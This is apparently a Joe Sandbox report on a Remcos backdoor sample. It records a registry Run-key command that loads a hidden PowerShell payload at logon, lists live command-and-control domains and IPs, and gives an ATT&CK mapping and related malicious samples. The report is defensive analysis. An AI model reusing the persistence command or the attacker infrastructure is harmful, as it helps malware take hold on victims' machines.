Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "feries" /t reg_expand_sz /d "%galliasses% -windowstyle 1 $misconceiving=(gp -path 'hkcu:\software\materialeanskaffelsernes\').applikationstilpasninger;%galliasses% ($misconceiving)"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "feries" /t reg_expand_sz /d "%galliasses% -windowstyle 1 $misconceiving=(gp -path 'hkcu:\software\materialeanskaffelsernes\').applikationstilpasninger;%galliasses% ($misconceiving)"			Jump to behavior

Source: msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager)sF
Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerows
Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managernet/
Source: msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerR
Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager7sd
Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager`
Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager~
Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerYs
Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager\s
Source: msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managery
Source: msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\x295IO8kqM.exe

0_2_0040326A

Stealing of Sensitive Information

Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 5324, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\aksloest.dat, type: DROPPED

Remote Access Functionality

Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 5324, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\aksloest.dat, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	2 Masquerading	11 Input Capture	11 Security Software Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	312 Process Injection	1 Modify Registry	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	2 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Access Token Manipulation	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	213 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	312 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
x295IO8kqM.exe	100%	Avira	TR/AVI.Agent.lbxod
x295IO8kqM.exe	39%	ReversingLabs	Win32.Backdoor.Remcos

Source	Detection	Scanner	Label
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
eweo9264gtuiorta1.duckdns.org	0%	Avira URL Cloud	safe
eweo9264gtuiort.duckdns.org	0%	Avira URL Cloud	safe
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
eweo9264gtuiorta1.duckdns.org	172.111.244.113	true	true	unknown
eweo9264gtuiort.duckdns.org	192.169.69.26	true	true	unknown
geoplugin.net	178.237.33.50	true	false	high
drive.google.com	172.217.215.102	true	false	high
drive.usercontent.google.com	108.177.122.132	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	false		high
eweo9264gtuiorta1.duckdns.org	true	Avira URL Cloud: safe	unknown
eweo9264gtuiort.duckdns.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://drive.google.com/?	msiexec.exe, 00000003.00000003.4145873580.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com	msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gplBs	msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gpoAJ	msiexec.exe, 00000003.00000003.3201211577.0000000024AA5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3201184446.0000000024AA4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 00000003.00000002.5248319710.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/(R	msiexec.exe, 00000003.00000002.5248447149.000000000080D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gpxeFp	msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/-449a-bb32-9d4a700c395b	msiexec.exe, 00000003.00000003.4145873580.0000000000828000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.000000000082B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/Hx	msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.quovadis.bm0	msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3051859071.000000000087D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/	msiexec.exe, 00000003.00000002.5248447149.000000000080D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	x295IO8kqM.exe	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3051859071.000000000087D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/g	msiexec.exe, 00000003.00000003.4145873580.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000836000.00000004.00000020.00020000.00000000.sdmp	false		high
http://geoplugin.net/json.gpqs	msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.215.102	drive.google.com	United States	15169	GOOGLEUS	false
108.177.122.132	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
172.111.244.113	eweo9264gtuiorta1.duckdns.org	United States	9009	M247GB	true
178.237.33.50	geoplugin.net	Netherlands	8455	ATOM86-ASATOM86NL	false
192.169.69.26	eweo9264gtuiort.duckdns.org	United States	23033	WOWUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574342
Start date and time:	2024-12-13 08:48:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	x295IO8kqM.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@11/17@5/5
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 99% Number of executed functions: 45 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: x295IO8kqM.exe

Simulations

Behavior and APIs

Time	Type	Description
02:50:10	API Interceptor	41x Sleep call for process: powershell.exe modified
02:51:18	API Interceptor	7509399x Sleep call for process: msiexec.exe modified
08:50:36	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Feries %Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)
08:50:44	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Feries %Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.111.244.113	DOCUMENT#5885588@081366(766.pdf.exe	Get hash	malicious	GuLoader, Remcos	Browse
178.237.33.50	7d74ApV4bb.exe	Get hash	malicious	Remcos, DBatLoader	Browse	geoplugin.net/json.gp
	greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	geoplugin.net/json.gp
	SwiftCopy_PaymtRecpt121224.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	WO-663071 Sabiya Power Station Project.vbs	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	4JwhvqLe8n.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	fIPSLgT0lO.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	IXCbn4ZcdS.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	d7gXUPUl38.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	3XSXmrEOw7.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	ozfqy8Ms6t.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
192.169.69.26	f5ATZ1i5CU.exe	Get hash	malicious	RedLine, XWorm	Browse	duclog23.duckdns.org:37552/
	SX8OLQP63C.exe	Get hash	malicious	VjW0rm, AsyncRAT, RATDispenser	Browse	yuya0415.duckdns.org:1928/Vre
	confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbs	Get hash	malicious	Unknown	Browse	servidorarquivos.duckdns.org/e/e
	oKtkBYZMWl.exe	Get hash	malicious	Unknown	Browse	csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
	oKtkBYZMWl.exe	Get hash	malicious	Unknown	Browse	csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
	http://yvtplhuqem.duckdns.org/ja/	Get hash	malicious	Unknown	Browse	yvtplhuqem.duckdns.org/ja/
	http://fqqqffcydg.duckdns.org/en/	Get hash	malicious	Unknown	Browse	fqqqffcydg.duckdns.org/en/
	http://yugdzvsqnf.duckdns.org/en/	Get hash	malicious	Unknown	Browse	yugdzvsqnf.duckdns.org/en/
	&nuevo_pedido#..vbs	Get hash	malicious	Unknown	Browse	servidorarquivos.duckdns.org/e/e
	transferencia_Hsbc.xlsx	Get hash	malicious	Unknown	Browse	servidorarquivos.duckdns.org/e/e

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
eweo9264gtuiorta1.duckdns.org	DOCUMENT#5885588@081366(766.pdf.exe	Get hash	malicious	GuLoader, Remcos	Browse	172.111.244.113
eweo9264gtuiort.duckdns.org	9FPFmh6r5t.exe	Get hash	malicious	Remcos, GuLoader	Browse	45.66.231.104
	Document#.exe	Get hash	malicious	Remcos	Browse	45.89.247.84
	Document2.exe	Get hash	malicious	GuLoader, Remcos	Browse	91.92.253.223
	2BP0Pl12C4.exe	Get hash	malicious	GuLoader, Remcos	Browse	91.92.250.84
	D511A37B2F8D6746F1AC95137E6B62DB7A1FFA14E5287.exe	Get hash	malicious	GuLoader, Remcos	Browse	46.183.220.203
geoplugin.net	7d74ApV4bb.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	178.237.33.50
	SwiftCopy_PaymtRecpt121224.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	WO-663071 Sabiya Power Station Project.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	4JwhvqLe8n.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	fIPSLgT0lO.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	IXCbn4ZcdS.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	d7gXUPUl38.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	3XSXmrEOw7.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	ozfqy8Ms6t.exe	Get hash	malicious	Remcos	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	x86_32.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	45.9.249.72
	IObitLiveUpdate.exe	Get hash	malicious	CobaltStrike	Browse	37.10.71.240
	VY2PWnR8K5.exe	Get hash	malicious	Nanocore, XWorm	Browse	104.250.175.42
	zZ8OdFfZnb.exe	Get hash	malicious	Unknown	Browse	185.158.248.216
	dkarts.dll.dll	Get hash	malicious	Unknown	Browse	185.158.248.216
	DOCUMENT#5885588@081366(766.pdf.exe	Get hash	malicious	GuLoader, Remcos	Browse	172.111.244.113
	SHIPPINGIN PL BT PDF.exe	Get hash	malicious	RedLine	Browse	77.90.185.55
	rebirth.spc.elf	Get hash	malicious	Mirai, Okiru	Browse	185.94.197.166
	YXHoexbTFp.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	185.100.157.28
	jew.arm7.elf	Get hash	malicious	Mirai	Browse	213.109.189.177
WOWUS	zvXPSu3dK5.exe	Get hash	malicious	AsyncRAT	Browse	192.169.69.26
	173398584769f9c5bcf28a71f77fba1335e77fe6b4cc4f05afc05fdd9f5830429be0bc9fb5758.dat-decoded.exe	Get hash	malicious	Remcos	Browse	192.169.69.26
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	192.169.69.26
	1733858044e64c59622ab494dda2ff98fce76991f7e15e513d6a3620e7f58ad7cc67d3889c571.dat-decoded.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	192.169.69.26
	f5ATZ1i5CU.exe	Get hash	malicious	RedLine, XWorm	Browse	192.169.69.26
	P0J8k3LhVV.exe	Get hash	malicious	Nanocore	Browse	192.169.69.26
	173349055645d097cf36f6a7cc8cd8874001209539b453cb16f6acd61c0d845ab62e19e89d339.dat-decoded.exe	Get hash	malicious	AsyncRAT	Browse	192.169.69.26
	173349048648c854fdb460c6c7c5fd91e325ea882961d8aa5918c705b053bb8e9350ae27c8877.dat-decoded.exe	Get hash	malicious	AsyncRAT	Browse	192.169.69.26
	17334905521d597933f8aaddb97573b46d117b288a865f8a218fac0e15588edac3edcab35b588.dat-decoded.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	192.169.69.26
	17334905555b1bb5616b6229d3e91468cd944baaeea0d1c904cc91a0fe89b683d653c3710f732.dat-decoded.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	192.169.69.26
ATOM86-ASATOM86NL	7d74ApV4bb.exe	Get hash	malicious	Remcos, DBatLoader	Browse	178.237.33.50
	greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	178.237.33.50
